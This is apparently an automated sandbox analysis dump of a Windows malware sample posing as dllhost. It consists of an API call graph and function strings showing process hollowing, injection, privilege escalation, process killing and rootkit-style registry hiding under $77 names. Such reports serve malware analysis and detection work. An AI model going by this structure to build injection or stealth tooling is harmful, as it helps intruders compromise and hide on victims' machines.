8850->8847 8851 290edd0b230 __std_exception_copy 2 API calls 8850->8851 8851->8850 8853 290edd0c3db 8852->8853 8857 290edd0c39f __std_exception_copy 8852->8857 8854 290edd0cfb4 __std_exception_copy 13 API calls 8853->8854 8856 290edd0c3d9 8854->8856 8855 290edd0c3c2 HeapAlloc 8855->8856 8855->8857 8856->8848 8857->8853 8857->8855 8858 290edd0b230 __std_exception_copy 2 API calls 8857->8858 8858->8857 8860 290edd0fd89 8859->8860 8861 290edd0db9a 8859->8861 8860->8861 8862 290edd10800 _invalid_parameter_noinfo 14 API calls 8860->8862 8863 290edd0fde0 8861->8863 8862->8861 8864 290edd0fe08 8863->8864 8865 290edd0fdf5 8863->8865 8864->8776 8865->8864 8866 290edd0e684 _invalid_parameter_noinfo 14 API calls 8865->8866 8866->8864 8868 290edd0ee38 8867->8868 8881 290edd0ed7d __vcrt_FlsAlloc 8867->8881 8885 290edd0c318 EnterCriticalSection 8868->8885 8870 290edd0eda2 LoadLibraryExW 8873 290edd0eec7 8870->8873 8874 290edd0edc7 GetLastError 8870->8874 8872 290edd0eee0 GetProcAddress 8872->8868 8873->8872 8876 290edd0eed7 FreeLibrary 8873->8876 8874->8881 8876->8872 8881->8868 8881->8870 8881->8872 8883 290edd0ee01 LoadLibraryExW 8881->8883 8883->8873 8883->8881 8888 290edd0ea21 MultiByteToWideChar 8886->8888 8891 290edd0eacc WideCharToMultiByte 8889->8891 8893 290edd0cb7a _invalid_parameter_noinfo 8892->8893 8894 290edd0cba2 RtlCaptureContext RtlLookupFunctionEntry 8893->8894 8895 290edd0cc24 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8894->8895 8896 290edd0cbee RtlVirtualUnwind 8894->8896 8897 290edd0cc76 _invalid_parameter_noinfo 8895->8897 8896->8895 8898 290edd07e30 _invalid_parameter_noinfo 8 API calls 8897->8898 8899 290edd0cc95 GetCurrentProcess TerminateProcess 8898->8899 9504 290edd0bf98 9505 290edd0bfb1 9504->9505 9507 290edd0bfc9 9504->9507 9506 290edd0d060 __free_lconv_num 13 API calls 9505->9506 9505->9507 9506->9507 10070 290edd0f49c 10071 290edd0f4a8 10070->10071 10073 290edd0f4cf 10071->10073 10074 290edd119cc 10071->10074 10075 290edd119d1 10074->10075 10076 290edd11a0c 10074->10076 10077 290edd119f2 DeleteCriticalSection 10075->10077 10078 290edd11a04 10075->10078 10076->10071 10077->10077 10077->10078 10079 290edd0d060 __free_lconv_num 13 API calls 10078->10079 10079->10076 8900 290edd1441f 8901 290edd144a2 8900->8901 8902 290edd14437 8900->8902 8902->8901 8903 290edd090e4 _CreateFrameInfo 9 API calls 8902->8903 8904 290edd14484 8903->8904 8905 290edd090e4 _CreateFrameInfo 9 API calls 8904->8905 8906 290edd14499 8905->8906 8907 290edd0c0b4 14 API calls 8906->8907 8907->8901 8134 140002d40 8135 140002d4d 8134->8135 8136 140002390 6 API calls 8135->8136 8137 140002d62 Sleep 8135->8137 8138 140002d6d ConnectNamedPipe 8135->8138 8136->8135 8137->8135 8139 140002db1 Sleep 8138->8139 8140 140002d7c ReadFile 8138->8140 8141 140002dbc DisconnectNamedPipe 8139->8141 8140->8141 8142 140002d9f 8140->8142 8141->8138 8142->8141 8908 290edd1461e 8909 290edd090e4 _CreateFrameInfo 9 API calls 8908->8909 8910 290edd1462c 8909->8910 8911 290edd14637 8910->8911 8912 290edd090e4 _CreateFrameInfo 9 API calls 8910->8912 8912->8911 9508 290edd01bc0 9515 290edd01724 GetProcessHeap HeapAlloc 9508->9515 9510 290edd01bd6 Sleep 9511 290edd01724 50 API calls 9510->9511 9513 290edd01bcf 9511->9513 9513->9510 9514 290edd0159c StrCmpIW StrCmpW 9513->9514 9566 290edd019b0 9513->9566 9514->9513 9583 290edd01264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9515->9583 9517 290edd0174c 9584 290edd01000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9517->9584 9519 290edd01754 9585 290edd01264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9519->9585 9521 290edd0175d 9586 290edd01264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9521->9586 9523 290edd01766 9587 290edd01264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9523->9587 9525 290edd0176f 9588 290edd01000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9525->9588 9527 290edd01778 9589 290edd01000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9527->9589 9529 290edd01781 9590 290edd01000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 9529->9590 9531 290edd0178a RegOpenKeyExW 9532 290edd019a2 9531->9532 9533 290edd017bc RegOpenKeyExW 9531->9533 9532->9513 9534 290edd017e5 9533->9534 9535 290edd017fb RegOpenKeyExW 9533->9535 9591 290edd012b8 RegQueryInfoKeyW 9534->9591 9537 290edd01836 RegOpenKeyExW 9535->9537 9538 290edd0181f 9535->9538 9539 290edd01871 RegOpenKeyExW 9537->9539 9540 290edd0185a 9537->9540 9600 290edd0104c RegQueryInfoKeyW 9538->9600 9544 290edd01895 9539->9544 9545 290edd018ac RegOpenKeyExW 9539->9545 9543 290edd012b8 16 API calls 9540->9543 9547 290edd01867 RegCloseKey 9543->9547 9548 290edd012b8 16 API calls 9544->9548 9549 290edd018d0 9545->9549 9550 290edd018e7 RegOpenKeyExW 9545->9550 9547->9539 9551 290edd018a2 RegCloseKey 9548->9551 9552 290edd012b8 16 API calls 9549->9552 9553 290edd01922 RegOpenKeyExW 9550->9553 9554 290edd0190b 9550->9554 9551->9545 9557 290edd018dd RegCloseKey 9552->9557 9555 290edd01946 9553->9555 9556 290edd0195d RegOpenKeyExW 9553->9556 9558 290edd0104c 6 API calls 9554->9558 9559 290edd0104c 6 API calls 9555->9559 9560 290edd01981 9556->9560 9561 290edd01998 RegCloseKey 9556->9561 9557->9550 9562 290edd01918 RegCloseKey 9558->9562 9563 290edd01953 RegCloseKey 9559->9563 9564 290edd0104c 6 API calls 9560->9564 9561->9532 9562->9553 9563->9556 9565 290edd0198e RegCloseKey 9564->9565 9565->9561 9605 290edd014a0 9566->9605 9583->9517 9584->9519 9585->9521 9586->9523 9587->9525 9588->9527 9589->9529 9590->9531 9592 290edd01323 GetProcessHeap HeapAlloc 9591->9592 9593 290edd01486 RegCloseKey 9591->9593 9594 290edd01472 GetProcessHeap HeapFree 9592->9594 9595 290edd0134e RegEnumValueW 9592->9595 9593->9535 9594->9593 9596 290edd013a1 9595->9596 9596->9594 9596->9595 9597 290edd01530 2 API calls 9596->9597 9598 290edd0141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 9596->9598 9599 290edd013cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9596->9599 9597->9596 9598->9596 9599->9598 9601 290edd011b5 RegCloseKey 9600->9601 9603 290edd010bf 9600->9603 9601->9537 9602 290edd010cf RegEnumValueW 9602->9603 9603->9601 9603->9602 9604 290edd0114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9603->9604 9604->9603 9606 290edd014e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 9605->9606 9607 290edd014c2 GetProcessHeap HeapFree 9605->9607 9607->9606 9607->9607 9799 290edd0bf40 9802 290edd0bcf8 9799->9802 9809 290edd0bcc0 9802->9809 9810 290edd0bcd0 9809->9810 9811 290edd0bcd5 9809->9811 9812 290edd0bc7c 13 API calls 9810->9812 9813 290edd0bcdc 9811->9813 9812->9811 9814 290edd0bcf1 9813->9814 9815 290edd0bcec 9813->9815 9817 290edd0bc7c 9814->9817 9816 290edd0bc7c 13 API calls 9815->9816 9816->9814 9818 290edd0bc81 9817->9818 9819 290edd0bcb2 9817->9819 9820 290edd0bcaa 9818->9820 9821 290edd0d060 __free_lconv_num 13 API calls 9818->9821 9822 290edd0d060 __free_lconv_num 13 API calls 9820->9822 9821->9818 9822->9819 10080 290edd0b2c0 10085 290edd0c318 EnterCriticalSection 10080->10085 7982 1400036c4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7983 14000371a K32EnumProcesses 7982->7983 7984 140003777 SleepEx 7983->7984 7985 14000372f 7983->7985 7984->7983 7985->7984 7987 140003220 7985->7987 7988 140003231 7987->7988 7989 140003259 7987->7989 7993 140001868 OpenProcess 7988->7993 7989->7985 7992 140001868 31 API calls 7992->7989 7994 140001d62 7993->7994 7995 1400018b0 IsWow64Process 7993->7995 7994->7992 7996 1400018c7 CloseHandle 7995->7996 7996->7994 7998 1400018ed 7996->7998 7998->7994 7999 14000192f OpenProcess 7998->7999 7999->7994 8000 14000194b OpenProcess 7999->8000 8001 1400019b6 8000->8001 8002 140001966 K32GetProcessImageFileNameW 8000->8002 8005 140001a95 NtQueryInformationProcess 8001->8005 8009 140001a71 StrCmpIW 8001->8009 8003 1400019ad CloseHandle 8002->8003 8004 14000197d PathFindFileNameW lstrlenW 8002->8004 8003->8001 8004->8003 8008 14000199a StrCpyW 8004->8008 8006 140001d59 CloseHandle 8005->8006 8007 140001aba 8005->8007 8006->7994 8007->8006 8010 140001ac4 OpenProcessToken 8007->8010 8008->8003 8009->8001 8009->8006 8010->8006 8011 140001ae2 GetTokenInformation 8010->8011 8012 140001b85 8011->8012 8013 140001b0a GetLastError 8011->8013 8015 140001b8c CloseHandle 8012->8015 8013->8012 8014 140001b15 LocalAlloc 8013->8014 8014->8012 8016 140001b2b GetTokenInformation 8014->8016 8015->8006 8020 140001ba0 8015->8020 8017 140001b73 8016->8017 8018 140001b53 GetSidSubAuthorityCount GetSidSubAuthority 8016->8018 8019 140001b7a LocalFree 8017->8019 8018->8019 8019->8015 8020->8006 8021 140001c2f StrStrA 8020->8021 8022 140001c58 8020->8022 8021->8020 8023 140001c5d 8021->8023 8022->8006 8023->8006 8024 140001c89 VirtualAllocEx 8023->8024 8024->8006 8025 140001cb8 WriteProcessMemory 8024->8025 8025->8006 8026 140001cd7 8025->8026 8034 140002c8c 8026->8034 8028 140001cf7 8028->8006 8029 140001d05 WaitForSingleObject 8028->8029 8030 140001d14 GetExitCodeThread 8029->8030 8031 140001d4e CloseHandle 8029->8031 8032 140001d33 VirtualFreeEx 8030->8032 8033 140001d2a 8030->8033 8031->8006 8032->8031 8033->8032 8037 14000215c GetModuleHandleA 8034->8037 8038 140002185 8037->8038 8039 14000217c GetProcAddress 8037->8039 8039->8038 8058 140002dc8 8061 140002ddc 8058->8061 8106 140002a9c 8061->8106 8064 140002a9c 14 API calls 8065 140002e04 GetCurrentProcessId OpenProcess 8064->8065 8066 140002e24 OpenProcessToken 8065->8066 8067 140002e96 RegOpenKeyExW 8065->8067 8068 140002e38 LookupPrivilegeValueW 8066->8068 8069 140002e8d CloseHandle 8066->8069 8070 140002ec7 RegQueryValueExW 8067->8070 8071 140002dd1 ExitProcess 8067->8071 8068->8069 8072 140002e4f AdjustTokenPrivileges 8068->8072 8069->8067 8070->8071 8073 140002ef7 RegQueryValueExW 8070->8073 8072->8069 8074 140002e87 GetLastError 8072->8074 8073->8071 8075 140002f27 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 8073->8075 8074->8069 8075->8071 8076 140002f99 RegQueryValueExW 8075->8076 8076->8071 8077 140002fc9 RegCloseKey GetCurrentProcessId 8076->8077 8120 14000209c GetProcessHeap HeapAlloc 8077->8120 8079 140002fe0 RegCreateKeyExW 8080 1400030da CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 8079->8080 8081 14000301d ConvertStringSecurityDescriptorToSecurityDescriptorW 8079->8081 8084 14000151c 50 API calls 8080->8084 8082 140003045 RegSetKeySecurity LocalFree 8081->8082 8083 14000305f RegCreateKeyExW 8081->8083 8082->8083 8085 140003099 GetCurrentProcessId RegSetValueExW RegCloseKey 8083->8085 8086 1400030d0 RegCloseKey 8083->8086 8087 140003164 8084->8087 8085->8086 8086->8080 8088 1400031a2 8087->8088 8089 140003170 ShellExecuteW 8087->8089 8090 14000148c 6 API calls 8088->8090 8089->8088 8089->8089 8091 1400031aa 8090->8091 8092 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8091->8092 8093 1400031b3 8092->8093 8094 14000148c 6 API calls 8093->8094 8095 1400031bc 8094->8095 8096 14000148c 6 API calls 8095->8096 8097 1400031c5 8096->8097 8098 14000148c 6 API calls 8097->8098 8099 1400031ce 8098->8099 8100 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8099->8100 8101 1400031d7 8100->8101 8102 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8101->8102 8103 1400031e0 8102->8103 8104 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 8103->8104 8105 1400031e9 GetProcessHeap HeapFree SleepEx 8104->8105 8105->8071 8107 140002aa5 StrCpyW StrCatW GetModuleHandleW 8106->8107 8108 140002c6f 8106->8108 8107->8108 8109 140002af6 GetCurrentProcess K32GetModuleInformation 8107->8109 8108->8064 8110 140002c66 FreeLibrary 8109->8110 8111 140002b26 CreateFileW 8109->8111 8110->8108 8111->8110 8112 140002b5b CreateFileMappingW 8111->8112 8113 140002b84 MapViewOfFile 8112->8113 8114 140002c5d CloseHandle 8112->8114 8115 140002c54 CloseHandle 8113->8115 8116 140002ba7 8113->8116 8114->8110 8115->8114 8116->8115 8117 140002bc0 lstrcmpiA 8116->8117 8119 140002bfe 8116->8119 8117->8116 8118 140002c00 VirtualProtect VirtualProtect 8117->8118 8118->8115 8119->8115 8126 140001d80 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 8120->8126 8122 140002135 GetProcessHeap HeapFree 8123 1400020e0 8123->8122 8124 140002101 OpenProcess 8123->8124 8124->8123 8125 140002117 TerminateProcess CloseHandle 8124->8125 8125->8123 8127 140001edf GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 8126->8127 8130 140001e0d 8126->8130 8127->8123 8128 140001e22 OpenProcess 8129 140001e3f K32EnumProcessModulesEx 8128->8129 8128->8130 8129->8130 8131 140001eca CloseHandle 8129->8131 8130->8127 8130->8128 8130->8131 8132 140001e79 ReadProcessMemory 8130->8132 8131->8130 8133 140001e9b 8132->8133 8133->8130 8133->8131 8133->8132 9608 290edd07fcc 9615 290edd08cf4 9608->9615 9614 290edd07fd9 9616 290edd09100 _CreateFrameInfo 9 API calls 9615->9616 9617 290edd07fd5 9616->9617 9617->9614 9618 290edd0c048 9617->9618 9619 290edd0c8d0 __std_exception_copy 13 API calls 9618->9619 9620 290edd07fe2 9619->9620 9620->9614 9621 290edd08d08 9620->9621 9624 290edd0909c 9621->9624 9623 290edd08d11 9623->9614 9625 290edd090ad 9624->9625 9629 290edd090c2 9624->9629 9626 290edd09a4c _CreateFrameInfo 6 API calls 9625->9626 9627 290edd090b2 9626->9627 9630 290edd09a94 9627->9630 9629->9623 9631 290edd0986c __vcrt_FlsAlloc 5 API calls 9630->9631 9632 290edd09ac2 9631->9632 9633 290edd09ad4 TlsSetValue 9632->9633 9634 290edd09acc 9632->9634 9633->9634 9634->9629 10086 290edd08ccc 10093 290edd0922c 10086->10093 10089 290edd08cd9 10095 290edd09234 10093->10095 10096 290edd09265 10095->10096 10097 290edd08cd5 10095->10097 10110 290edd09ae8 10095->10110 10098 290edd09274 __vcrt_uninitialize_locks DeleteCriticalSection 10096->10098 10097->10089 10099 290edd091c0 10097->10099 10098->10097 10115 290edd099bc 10099->10115 10111 290edd0986c __vcrt_FlsAlloc 5 API calls 10110->10111 10112 290edd09b1e 10111->10112 10113 290edd09b33 InitializeCriticalSectionAndSpinCount 10112->10113 10114 290edd09b28 10112->10114 10113->10114 10114->10095 10116 290edd0986c __vcrt_FlsAlloc 5 API calls 10115->10116 10117 290edd099e1 TlsAlloc 10116->10117 8913 290edd05a4d 8915 290edd05a54 8913->8915 8914 290edd05abb 8915->8914 8916 290edd05b37 VirtualProtect 8915->8916 8917 290edd05b71 8916->8917 8918 290edd05b63 GetLastError 8916->8918 8918->8917 8919 290edd0f630 8920 290edd0f660 8919->8920 8922 290edd0f687 8919->8922 8921 290edd0c8d0 __std_exception_copy 13 API calls 8920->8921 8920->8922 8926 290edd0f674 8920->8926 8921->8926 8923 290edd0f75c 8922->8923 8942 290edd0c318 EnterCriticalSection 8922->8942 8927 290edd0f873 8923->8927 8929 290edd0f7c3 8923->8929 8935 290edd0f78a 8923->8935 8925 290edd0f6c4 8926->8922 8926->8925 8928 290edd0f709 8926->8928 8930 290edd0f880 8927->8930 8944 290edd0c36c LeaveCriticalSection 8927->8944 8931 290edd0cfb4 __std_exception_copy 13 API calls 8928->8931 8939 290edd0f821 8929->8939 8943 290edd0c36c LeaveCriticalSection 8929->8943 8934 290edd0f70e 8931->8934 8936 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8934->8936 8935->8929 8937 290edd0c870 _invalid_parameter_noinfo 14 API calls 8935->8937 8936->8925 8938 290edd0f7b3 8937->8938 8940 290edd0c870 _invalid_parameter_noinfo 14 API calls 8938->8940 8941 290edd0c870 14 API calls _invalid_parameter_noinfo 8939->8941 8940->8929 8941->8939 9832 290edd0f130 VirtualProtect 8945 290edd08432 8948 290edd08e80 8945->8948 8947 290edd0845d 8949 290edd08ed6 8948->8949 8950 290edd08ea1 8948->8950 8949->8947 8950->8949 8952 290edd0c0e8 8950->8952 8953 290edd0c0ff 8952->8953 8954 290edd0c0f5 8952->8954 8955 290edd0cfb4 __std_exception_copy 13 API calls 8953->8955 8954->8953 8959 290edd0c11a 8954->8959 8956 290edd0c106 8955->8956 8957 290edd0ce0c _invalid_parameter_noinfo 38 API calls 8956->8957 8958 290edd0c112 8957->8958 8958->8949 8959->8958 8960 290edd0cfb4 __std_exception_copy 13 API calls 8959->8960 8960->8956 8961 290edd02c34 8963 290edd02c88 8961->8963 8962 290edd02ca3 8963->8962 8965 290edd035c4 8963->8965 8966 290edd0365a 8965->8966 8968 290edd035e9 8965->8968 8966->8962 8967 290edd03d4c StrCmpNIW 8967->8968 8968->8966 8968->8967 8969 290edd01e04 StrCmpIW StrCmpW 8968->8969 8969->8968 9833 290edd05734 9834 290edd0573a 9833->9834 9845 290edd07d60 9834->9845 9839 290edd05837 9841 290edd059bd 9839->9841 9843 290edd0579e 9839->9843 9858 290edd07940 9839->9858 9840 290edd05abb 9841->9840 9842 290edd05b37 VirtualProtect 9841->9842 9842->9843 9844 290edd05b63 GetLastError 9842->9844 9844->9843 9847 290edd07d6b 9845->9847 9846 290edd0577d 9846->9843 9854 290edd041c0 9846->9854 9847->9846 9848 290edd0b230 __std_exception_copy 2 API calls 9847->9848 9849 290edd07d8a 9847->9849 9848->9847 9850 290edd07d95 9849->9850 9864 290edd08578 9849->9864 9868 290edd08598 9850->9868 9855 290edd041dd 9854->9855 9857 290edd0424c 9855->9857 9872 290edd04430 9855->9872 9857->9839 9859 290edd07987 9858->9859 9897 290edd07710 9859->9897 9862 290edd07e30 _invalid_parameter_noinfo 8 API calls 9863 290edd079b1 9862->9863 9863->9839 9865 290edd08586 std::bad_alloc::bad_alloc 9864->9865 9866 290edd08f38 Concurrency::cancel_current_task 2 API calls 9865->9866 9867 290edd08597 9866->9867 9869 290edd085a6 std::bad_alloc::bad_alloc 9868->9869 9870 290edd08f38 Concurrency::cancel_current_task 2 API calls 9869->9870 9871 290edd07d9b 9870->9871 9873 290edd04454 9872->9873 9874 290edd04477 9872->9874 9873->9874 9886 290edd03ee0 9873->9886 9875 290edd044ad 9874->9875 9892 290edd04010 9874->9892 9876 290edd044dd 9875->9876 9879 290edd04010 2 API calls 9875->9879 9881 290edd03ee0 3 API calls 9876->9881 9884 290edd04513 9876->9884 9879->9876 9880 290edd03ee0 3 API calls 9882 290edd0452f 9880->9882 9881->9884 9883 290edd04010 2 API calls 9882->9883 9885 290edd0454b 9882->9885 9883->9885 9884->9880 9884->9882 9885->9857 9891 290edd03f01 9886->9891 9887 290edd03f70 9887->9874 9888 290edd03f56 VirtualQuery 9888->9887 9888->9891 9889 290edd03f8a VirtualAlloc 9889->9887 9890 290edd03fbb GetLastError 9889->9890 9890->9891 9891->9887 9891->9888 9891->9889 9896 290edd04028 9892->9896 9893 290edd04097 9893->9875 9894 290edd0407d VirtualQuery 9894->9893 9894->9896 9895 290edd040e2 GetLastError 9895->9896 9896->9893 9896->9894 9896->9895 9898 290edd0772b 9897->9898 9899 290edd07741 SetLastError 9898->9899 9900 290edd0774f 9898->9900 9899->9900 9900->9862 10119 290edd144b5 10120 290edd090e4 _CreateFrameInfo 9 API calls 10119->10120 10121 290edd144cd 10120->10121 10122 290edd090e4 _CreateFrameInfo 9 API calls 10121->10122 10123 290edd144e8 10122->10123 10124 290edd090e4 _CreateFrameInfo 9 API calls 10123->10124 10125 290edd144fc 10124->10125 10126 290edd090e4 _CreateFrameInfo 9 API calls 10125->10126 10127 290edd1453e 10126->10127 10128 290edd02cb8 10130 290edd02d15 10128->10130 10129 290edd02d30 10130->10129 10131 290edd03678 3 API calls 10130->10131 10131->10129 9635 290edd05db9 9636 290edd05dc0 VirtualProtect 9635->9636 9637 290edd05de9 GetLastError 9636->9637 9638 290edd05cd0 9636->9638 9637->9638 9639 290edd03fb9 9644 290edd03f06 9639->9644 9640 290edd03f70 9641 290edd03f56 VirtualQuery 9641->9640 9641->9644 9642 290edd03f8a VirtualAlloc 9642->9640 9643 290edd03fbb GetLastError 9642->9643 9643->9644 9644->9640 9644->9641 9644->9642 8970 290edd1363c 8971 290edd13674 __GSHandlerCheckCommon 8970->8971 8972 290edd136a0 8971->8972 8974 290edd097e4 8971->8974 8975 290edd090e4 _CreateFrameInfo 9 API calls 8974->8975 8976 290edd0980e 8975->8976 8977 290edd090e4 _CreateFrameInfo 9 API calls 8976->8977 8978 290edd0981b 8977->8978 8979 290edd090e4 _CreateFrameInfo 9 API calls 8978->8979 8980 290edd09824 8979->8980 8980->8972 9645 290edd0c9bc 9650 290edd0f160 9645->9650 9647 290edd0c9c5 9648 290edd0c8d0 __std_exception_copy 13 API calls 9647->9648 9649 290edd0c9e2 __vcrt_uninitialize_ptd 9647->9649 9648->9649 9651 290edd0f171 9650->9651 9652 290edd0f175 9650->9652 9651->9647 9652->9651 9653 290edd0ed48 9 API calls 9652->9653 9653->9651 8981 140003260 8982 140003287 8981->8982 8983 140003479 8981->8983 8984 1400033e7 GetProcessHeap HeapAlloc K32EnumProcesses 8982->8984 8985 14000328d 8982->8985 8986 1400035f5 ReadFile 8983->8986 8987 140003485 8983->8987 8993 140003425 8984->8993 8999 140003325 8984->8999 8988 140003299 8985->8988 8989 1400033de ExitProcess 8985->8989 8990 14000361f 8986->8990 8986->8999 8991 1400035eb 8987->8991 8992 14000348e 8987->8992 8995 140003346 RegOpenKeyExW 8988->8995 9000 1400032a2 8988->9000 8996 14000362c GetProcessHeap HeapAlloc 8990->8996 8990->8999 8994 14000200c 22 API calls 8991->8994 8997 14000349a 8992->8997 8998 140003590 8992->8998 8993->8999 9011 140001868 31 API calls 8993->9011 8994->8999 9005 140003373 RegDeleteValueW RegDeleteValueW RegDeleteValueW 8995->9005 9006 1400033af 8995->9006 9001 140001d80 13 API calls 8996->9001 9002 1400034dc 8997->9002 9003 14000349f 8997->9003 9004 14000218c ReadFile 8998->9004 9000->8999 9013 1400032bc ReadFile 9000->9013 9023 140003665 9001->9023 9057 14000218c 9002->9057 9003->8999 9054 140002cec 9003->9054 9008 14000359f 9004->9008 9005->9006 9041 14000220c SysAllocString SysAllocString CoInitializeEx 9006->9041 9008->8999 9020 14000218c ReadFile 9008->9020 9011->8993 9012 1400033bb 9017 14000220c 9 API calls 9012->9017 9013->8999 9018 1400032e6 9013->9018 9014 14000369a GetProcessHeap HeapFree 9014->8999 9016 1400034f3 ReadFile 9016->8999 9021 14000351b 9016->9021 9022 1400033c7 9017->9022 9018->8999 9028 140001868 31 API calls 9018->9028 9025 1400035b6 9020->9025 9021->8999 9026 140003528 GetProcessHeap HeapAlloc ReadFile 9021->9026 9049 14000200c GetProcessHeap HeapAlloc 9022->9049 9023->9014 9029 14000358b 9023->9029 9089 140001f7c 9023->9089 9025->8999 9031 1400035be ShellExecuteW 9025->9031 9026->9014 9032 14000356c 9026->9032 9034 14000330c 9028->9034 9029->9014 9031->8999 9032->9014 9061 1400024c4 9032->9061 9037 140001868 31 API calls 9034->9037 9037->8999 9042 140002368 SysFreeString SysFreeString 9041->9042 9043 14000224d CoInitializeSecurity 9041->9043 9042->9012 9044 140002295 CoCreateInstance 9043->9044 9045 140002289 9043->9045 9046 140002362 CoUninitialize 9044->9046 9047 1400022c4 VariantInit 9044->9047 9045->9044 9045->9046 9046->9042 9048 14000231a 9047->9048 9048->9046 9050 140001d80 13 API calls 9049->9050 9052 14000204a 9050->9052 9051 140002078 GetProcessHeap HeapFree 9052->9051 9053 140001f7c 5 API calls 9052->9053 9053->9052 9055 14000215c 2 API calls 9054->9055 9056 140002d01 9055->9056 9058 1400021b0 ReadFile 9057->9058 9059 1400021d3 9058->9059 9060 1400021ed 9058->9060 9059->9058 9059->9060 9060->8999 9060->9016 9062 1400024ff 9061->9062 9086 1400027b6 9061->9086 9063 14000215c 2 API calls 9062->9063 9068 14000253e 9062->9068 9062->9086 9063->9068 9064 140002567 CreateProcessW 9064->9068 9065 140002971 OpenProcess 9067 140002981 TerminateProcess 9065->9067 9065->9068 9066 14000215c GetModuleHandleA GetProcAddress 9066->9068 9067->9068 9068->9064 9068->9065 9068->9066 9069 1400025f6 VirtualAllocEx 9068->9069 9070 1400027cf VirtualAllocEx 9068->9070 9075 140002712 VirtualAlloc 9068->9075 9076 1400028e8 VirtualAlloc 9068->9076 9077 140002689 WriteProcessMemory 9068->9077 9079 140002860 WriteProcessMemory 9068->9079 9068->9086 9087 1400028aa VirtualProtectEx 9068->9087 9088 1400026d3 VirtualProtectEx 9068->9088 9069->9068 9071 140002625 WriteProcessMemory 9069->9071 9070->9068 9072 1400027fd WriteProcessMemory 9070->9072 9071->9068 9073 140002647 VirtualProtectEx 9071->9073 9072->9068 9074 14000281f VirtualProtectEx 9072->9074 9073->9068 9074->9068 9075->9068 9080 140002737 GetThreadContext 9075->9080 9076->9068 9078 140002909 Wow64GetThreadContext 9076->9078 9077->9068 9078->9068 9082 140002921 WriteProcessMemory 9078->9082 9079->9068 9080->9068 9081 140002754 WriteProcessMemory 9080->9081 9081->9068 9083 14000277f SetThreadContext 9081->9083 9082->9068 9084 140002946 Wow64SetThreadContext 9082->9084 9083->9068 9085 1400027a2 ResumeThread 9083->9085 9084->9068 9085->9068 9085->9086 9086->9029 9087->9068 9088->9068 9090 140001ff5 9089->9090 9091 140001f9b OpenProcess 9089->9091 9090->9014 9091->9090 9092 140001fb3 9091->9092 9093 140002c8c 2 API calls 9092->9093 9094 140001fd3 9093->9094 9095 140001fec CloseHandle 9094->9095 9096 140001fe1 CloseHandle 9094->9096 9095->9090 9096->9095

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0000000140002DDC Relevance: 84.3, APIs: 36, Strings: 12, Instructions: 258registrymemorythreadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                                                                                                  • String ID: $77dll32$$77dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$77config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                                                                                  • API String ID: 3658652915-1738273123
                                                                                                                                  • Opcode ID: 8cb07cfd19e92681a27ef1aace84ef88a97f83a90cd6251db88ec3e17d8b8361
                                                                                                                                  • Instruction ID: fbb8513ee83118497ee22a940d70a6b4ab310a9109fcb5f2c2acc4855114c1eb
                                                                                                                                  • Opcode Fuzzy Hash: 8cb07cfd19e92681a27ef1aace84ef88a97f83a90cd6251db88ec3e17d8b8361
                                                                                                                                  • Instruction Fuzzy Hash: E7C101B6200A4086EB26EF62F8547DA37A5FB8CBD8F414116FB4A43A75DF38C589C744
                                                                                                                                  Function 0000000140001868 Relevance: 80.8, APIs: 29, Strings: 17, Instructions: 313memorystringnativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
